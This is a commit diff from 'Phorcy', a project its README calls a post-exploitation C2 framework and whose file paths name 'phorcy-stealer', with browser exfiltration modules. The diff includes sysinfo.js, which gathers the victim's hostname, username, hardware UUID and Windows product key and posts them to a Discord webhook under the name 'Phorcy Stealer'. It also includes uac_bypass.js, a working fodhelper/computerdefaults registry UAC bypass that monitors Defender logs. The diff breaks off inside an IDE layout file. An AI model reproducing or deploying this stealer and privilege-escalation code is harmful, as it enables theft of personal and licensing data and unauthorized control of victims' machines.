Full refactor/better docs

.vs/ProjectSettings.json

@@ -0,0 +1,3 @@
+{
+  "CurrentProjectSetting": "No Configurations"
+}

.vs/VSWorkspaceState.json

@@ -0,0 +1,11 @@
+{
+  "ExpandedNodes": [
+    "",
+    "\\main",
+    "\\main\\port",
+    "\\main\\port\\payload",
+    "\\main\\port\\payload\\phorcy"
+  ],
+  "SelectedNode": "\\main\\port\\payload\\phorcy\\phorcy-master.sln",
+  "PreviewInSolutionExplorer": false
+}

Builder/Builder.bat

@@ -1 +0,0 @@
-

Images/picture.png

@@ -1 +0,0 @@
-

Installation/Install.bat

@@ -1 +0,0 @@
-

README.md

@@ -1,18 +1,71 @@
-# phorcy
-Phorcy
+# Phorcy
 
-**Warning**
-> This Tool is for educational purposes only.
-Do not release.
-**Note**
-# Programming languages: NIM; C++, Python; Javascript.
+**Status:** In active development  
+**Primary Languages:** C++, Nim, Python, JavaScript, Elixir, D, Rust  
+**Project Type:** Post-exploitation C2 framework  
+**Last Major Update:** 1st of February 2026  
 
-# Status: Unfinished
-Date finished: N/A
-# Title: Phorcy
-Description: ...
-# Main developers:
-Synthetic; Cat ;Eline
+---
 
-Contains numerous new tools in NIM (tested on v. 2.0.0 unless written otherwise) that implement very important features for a project like this.
-Last updated: 29th November 2023. Time: Morning in Europe.
+## Overview
+
+**Phorcy** is an experimental, multi-language post-exploitation c2 framework focused on efficiency, lightweight executables, and cross-language interoperability featuring multiple exfiltration features.
+
+This project is still evolving, with several core systems being actively reworked and standardized.
+
+---
+
+## Architecture (High Level)
+
+Phorcy follows a layered design:
+
+| Layer | Language | Purpose |
+|-------|----------|---------|
+| Core C2 Payload for both Windows & Linux | **C++** | Performance-critical logic, base framework, and foundational modules |
+| Bootstrap / Lightweight Loader & Loader | **Nim** | Minimal initialization and low-level exploitation components |
+| Tooling & Automation | **Python / JavaScrip / TypeScript / Elixir** | Obfuscation scripts, tests, build tooling, and telegram robot/discord webhook management |
+| Cryptographic Tooling / Libraries | **D / Rust** | [Customized Threefish512-CTR with BLAKE3-MAC verify-before-decrypt](<https://git.fingeri.ng/whiskers/cryptography/src/branch/master/crypto/threefish512_ctr>) / [Slightly ported/forked Curve41417](<https://github.com/seb-m/curve41417.rs>) |
+
+This structure allows a clean separation of responsibilities between languages.
+
+---
+
+## Project Status
+
+Phorcy is **unfinished** and considered a long-term experimental project. Internal structures, interfaces, and design choices may change significantly.
+
+---
+
+## Changelog
+
+### Major Project Changes
+
+1st of February 2026 - Project was entirely revived, new dev joined & is now in active development again
+
+- A **full foundational base structure** has now been established, replacing earlier experimental fragments.
+- The **codebase was largely rewritten in C++** to improve performance, consistency, and maintainability.
+- The Nim portion was reduced to **a stager and registry high-level API wrapper**.
+- Internal module organization and architecture were standardized.
+- **Cookie** joined the development team.
+- **Synthetic** is no longer involved in the project.
+- **Eline** is no longer involved in the project.
+- **Threefish512-CTR** / **curve41417** is being implemented into the project.
+
+29th November 2023 - "Contains numerous new tools in NIM (tested on v. 2.0.0 unless written otherwise) that implement very important features for a project like this."
+
+**~**
+
+
+---
+
+## Roadmap
+
+Planned areas of exploration include:
+
+- A **REST API layer** to route discord/telegram API/local web api requests and process lightweight agent information
+- A **telegram-based** robot for build and packaging workflows
+- Expanded **linux support**.
+- A unified **remote management and service integration framework** within the main architecture.
+- Continued modularization and documentation improvements.
+
+---

main/base/modules/sysinfo.js

@@ -1,70 +1,70 @@
-const si = require('systeminformation');
-const fs = require('fs');
-const axios = require('axios');
-const os = require('os')
-const path = require('path')
-const { execSync } = require('child_process')
-
-/// const config = {
-///   webhook: "https://discord.com/api/webhooks/xxx/xxx"
-///};
-
-async function systemInformationFullCopy() {
-    try {
-        const resultObject = await si.getAllData();
-        const jsonResult = JSON.stringify(resultObject, null, 2);
-        const phorcyPath = `${process.env.LOCALAPPDATA}\\Phorcy`;
-        fs.mkdir(phorcyPath, (err) => {
-            if (err && !err.message.includes('EEXIST')) {
-            } else {
-                const filePath = `${phorcyPath}\\system_info.json`;
-                fs.writeFileSync(filePath, jsonResult);
-            }
-        });
-    } catch {}
-}
-
-async function systemInformationDump() {
-    try {
-        const hostname = os.hostname();
-        const username = os.userInfo().username;
-        const uuid = await execSync("wmic csproduct get uuid", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
-        const product_key = await execSync("wmic path softwarelicensingservice get OA3xOriginalProductKey", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
-        const device_model = await execSync("wmic csproduct get name", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
-        const system_environment = await execSync("wmic os get Caption", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
-        const system_language = await execSync('wmic os get MUILanguages', { stdio: ['inherit', 'pipe'] }).toString().trim().match(/"([^"]*)"/)[1];
-        const execution_path = path.resolve(__filename);
-
-        const sysinfembed = {
-            username: 'Phorcy Stealer',
-            avatar_url: 'https://cdn.discordapp.com/attachments/1173375133294002236/1174057935794614433/phorcy.jpg',
-            embeds: [
-                {
-                    title: `System, Victim:${uuid}`,
-                    description: 'System Information Captured.',
-                    color: 0x0013de,
-                    footer: {
-                        text: 't.me/phorcy',
-                    },
-                    fields: [
-                        { name: 'Hostname', value: `\`\`\`${hostname}\`\`\``, inline: false },
-                        { name: 'Username', value: `\`\`\`${username}\`\`\``, inline: false },
-                        { name: 'UUID', value: `\`\`\`${uuid}\`\`\``, inline: false },
-                        { name: 'Product Key', value: `\`\`\`${product_key}\`\`\``, inline: false },
-                        { name: 'Device Model', value: `\`\`\`${device_model}\`\`\``, inline: false },
-                        { name: 'System Environment', value: `\`\`\`${system_environment}\`\`\``, inline: false },
-                        { name: 'System Language', value: `\`\`\`${system_language}\`\`\``, inline: false },
-                        { name: 'Execution Path', value: `\`\`\`${execution_path}\`\`\``, inline: false },
-                    ],
-                },
-            ],
-        };
-        await axios.post(config.webhook, sysinfembed, { headers: { 'Content-Type': 'application/json' } });
-    } catch {}
-}
-
-// systemInformationFullCopy();
-
-systemInformationDump();
-
-console.log('Hello, World!')
+const si = require('systeminformation');
+const fs = require('fs');
+const axios = require('axios');
+const os = require('os')
+const path = require('path')
+const { execSync } = require('child_process')
+
+/// const config = {
+///   webhook: "https://discord.com/api/webhooks/xxx/xxx"
+///};
+
+async function systemInformationFullCopy() {
+    try {
+        const resultObject = await si.getAllData();
+        const jsonResult = JSON.stringify(resultObject, null, 2);
+        const phorcyPath = `${process.env.LOCALAPPDATA}\\Phorcy`;
+        fs.mkdir(phorcyPath, (err) => {
+            if (err && !err.message.includes('EEXIST')) {
+            } else {
+                const filePath = `${phorcyPath}\\system_info.json`;
+                fs.writeFileSync(filePath, jsonResult);
+            }
+        });
+    } catch {}
+}
+
+async function systemInformationDump() {
+    try {
+        const hostname = os.hostname();
+        const username = os.userInfo().username;
+        const uuid = await execSync("wmic csproduct get uuid", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
+        const product_key = await execSync("wmic path softwarelicensingservice get OA3xOriginalProductKey", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
+        const device_model = await execSync("wmic csproduct get name", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
+        const system_environment = await execSync("wmic os get Caption", { stdio: ["inherit", "pipe"] }).toString().split('\n')[1].trim();
+        const system_language = await execSync('wmic os get MUILanguages', { stdio: ['inherit', 'pipe'] }).toString().trim().match(/"([^"]*)"/)[1];
+        const execution_path = path.resolve(__filename);
+
+        const sysinfembed = {
+            username: 'Phorcy Stealer',
+            avatar_url: 'https://cdn.discordapp.com/attachments/1173375133294002236/1174057935794614433/phorcy.jpg',
+            embeds: [
+                {
+                    title: `System, Victim:${uuid}`,
+                    description: 'System Information Captured.',
+                    color: 0x0013de,
+                    footer: {
+                        text: 't.me/phorcy',
+                    },
+                    fields: [
+                        { name: 'Hostname', value: `\`\`\`${hostname}\`\`\``, inline: false },
+                        { name: 'Username', value: `\`\`\`${username}\`\`\``, inline: false },
+                        { name: 'UUID', value: `\`\`\`${uuid}\`\`\``, inline: false },
+                        { name: 'Product Key', value: `\`\`\`${product_key}\`\`\``, inline: false },
+                        { name: 'Device Model', value: `\`\`\`${device_model}\`\`\``, inline: false },
+                        { name: 'System Environment', value: `\`\`\`${system_environment}\`\`\``, inline: false },
+                        { name: 'System Language', value: `\`\`\`${system_language}\`\`\``, inline: false },
+                        { name: 'Execution Path', value: `\`\`\`${execution_path}\`\`\``, inline: false },
+                    ],
+                },
+            ],
+        };
+        await axios.post(config.webhook, sysinfembed, { headers: { 'Content-Type': 'application/json' } });
+    } catch {}
+}
+
+// systemInformationFullCopy();
+
+systemInformationDump();
+
+console.log('Hello, World!')

main/base/modules/uac_bypass.js

@@ -1,56 +1,56 @@
-const { execSync } = require('child_process');
-const os = require('os');
-function UACbypass(method = 1) {
-    const execute = (cmd) => execSync(cmd, { shell: true, stdio: 'pipe' }).toString();
-
-    if (GetSelf()[1]) {
-        if (method === 1 || method === 2) {
-            const executable = process.execPath.replace(/\\/g, '\\\\');
-
-            execute(`reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /d "${executable}" /f`);
-            execute('reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f');
-
-            const logCountBefore = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
-            
-            if (method === 1) {
-                execute('computerdefaults --nouacbypass');
-            } else if (method === 2) {
-                execute('fodhelper --nouacbypass');
-            }
-
-            const logCountAfter = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
-
-            execute('reg delete hkcu\\Software\\Classes\\ms-settings /f');
-
-            if (logCountAfter > logCountBefore) {
-                return UACbypass(method + 1);
-            }
-        } else {
-            return false;
-        }
-        return true;
-    }
-}
-function IsAdmin() {
-    return os.userInfo().username === 'Administrator';
-}
-function GetSelf() {
-    if (process.pkg) {
-        return [process.execPath, true];
-    } else {
-        return [__filename, false];
-    }
-}
-if (require.main === module) {
-    if (IsAdmin()) {
-        console.log("Already running with admin privileges.");
-    } else {
-        console.log("Running without admin privileges. Trying to bypass UAC...");
-        const bypassSuccessful = UACbypass();
-        if (bypassSuccessful) {
-            console.log("UAC bypass successful.");
-        } else {
-            console.log("UAC bypass unsuccessful.");
-        }
-    }
+const { execSync } = require('child_process');
+const os = require('os');
+function UACbypass(method = 1) {
+    const execute = (cmd) => execSync(cmd, { shell: true, stdio: 'pipe' }).toString();
+
+    if (GetSelf()[1]) {
+        if (method === 1 || method === 2) {
+            const executable = process.execPath.replace(/\\/g, '\\\\');
+
+            execute(`reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /d "${executable}" /f`);
+            execute('reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f');
+
+            const logCountBefore = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
+            
+            if (method === 1) {
+                execute('computerdefaults --nouacbypass');
+            } else if (method === 2) {
+                execute('fodhelper --nouacbypass');
+            }
+
+            const logCountAfter = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
+
+            execute('reg delete hkcu\\Software\\Classes\\ms-settings /f');
+
+            if (logCountAfter > logCountBefore) {
+                return UACbypass(method + 1);
+            }
+        } else {
+            return false;
+        }
+        return true;
+    }
+}
+function IsAdmin() {
+    return os.userInfo().username === 'Administrator';
+}
+function GetSelf() {
+    if (process.pkg) {
+        return [process.execPath, true];
+    } else {
+        return [__filename, false];
+    }
+}
+if (require.main === module) {
+    if (IsAdmin()) {
+        console.log("Already running with admin privileges.");
+    } else {
+        console.log("Running without admin privileges. Trying to bypass UAC...");
+        const bypassSuccessful = UACbypass();
+        if (bypassSuccessful) {
+            console.log("UAC bypass successful.");
+        } else {
+            console.log("UAC bypass unsuccessful.");
+        }
+    }
 }

main/port/payload/phorcy/.vs/phorcy-master/v17/DocumentLayout.json

@@ -0,0 +1,258 @@
+{
+  "Version": 1,
+  "WorkspaceRootPath": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\",
+  "Documents": [
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\ip.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\utils\\ip.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\utils.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\utils\\utils.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\conf.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\anti_dbg\\win\\exploitation\\conf.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\conf.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\conf.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\include.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\include.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\main.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\main.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\shell\\shell.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\chromium.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\chromium.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\gecko.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\gecko.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\browser.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\browser.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
+      "RelativeMoniker": "D:0:0:{F9DFC7AE-C751-420A-AD18-C4D059C1F0B2}|phorcy-master\\phorcy-master.vcxproj|solutionrelative:phorcy-master\\windows\\exfil\\browser\\browser.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
+    }
+  ],
+  "DocumentGroupContainers": [
+    {
+      "Orientation": 0,
+      "VerticalTabListWidth": 256,
+      "DocumentGroups": [
+        {
+          "DockedWidth": 200,
+          "SelectedChildIndex": 0,
+          "Children": [
+            {
+              "$type": "Document",
+              "DocumentIndex": 0,
+              "Title": "ip.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\ip.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\utils\\ip.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\ip.cpp",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\utils\\ip.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAABwAAAAVAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:22:32.799Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 1,
+              "Title": "utils.h",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\utils.h",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\utils\\utils.h",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\utils\\utils.h",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\utils\\utils.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2026-02-01T02:22:26.132Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 2,
+              "Title": "conf.h",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
+              "RelativeDocumentMoniker": "phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
+              "RelativeToolTip": "phorcy-master\\anti_dbg\\win\\exploitation\\conf.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2026-02-01T02:12:53.327Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 3,
+              "Title": "conf.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\conf.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\conf.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\conf.cpp",
+              "RelativeToolTip": "phorcy-master\\conf.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:12:36.33Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 4,
+              "Title": "include.h",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\include.h",
+              "RelativeDocumentMoniker": "phorcy-master\\include.h",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\include.h",
+              "RelativeToolTip": "phorcy-master\\include.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2026-02-01T02:12:32.636Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 5,
+              "Title": "main.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\main.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\main.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\main.cpp",
+              "RelativeToolTip": "phorcy-master\\main.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:12:03.519Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 7,
+              "Title": "exploitation.h",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
+              "RelativeDocumentMoniker": "phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
+              "RelativeToolTip": "phorcy-master\\anti_dbg\\win\\exploitation\\exploitation.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2026-02-01T02:11:59.206Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 6,
+              "Title": "user_account_control.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
+              "RelativeToolTip": "phorcy-master\\anti_dbg\\win\\exploitation\\user_account_control.cpp",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
+              "WhenOpened": "2026-02-01T02:11:47.589Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 8,
+              "Title": "shell.h",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.h",
+              "ViewState": "AgIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
+              "WhenOpened": "2026-02-01T02:10:54.014Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 9,
+              "Title": "shell.cpp",
+              "DocumentMoniker": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
+              "RelativeDocumentMoniker": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
+              "ToolTip": "C:\\Users\\wm\\Documents\\projects\\phorcy-stealer\\main\\port\\payload\\phorcy\\phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
+              "RelativeToolTip": "phorcy-master\\windows\\exfil\\browser\\shell\\shell.cpp",
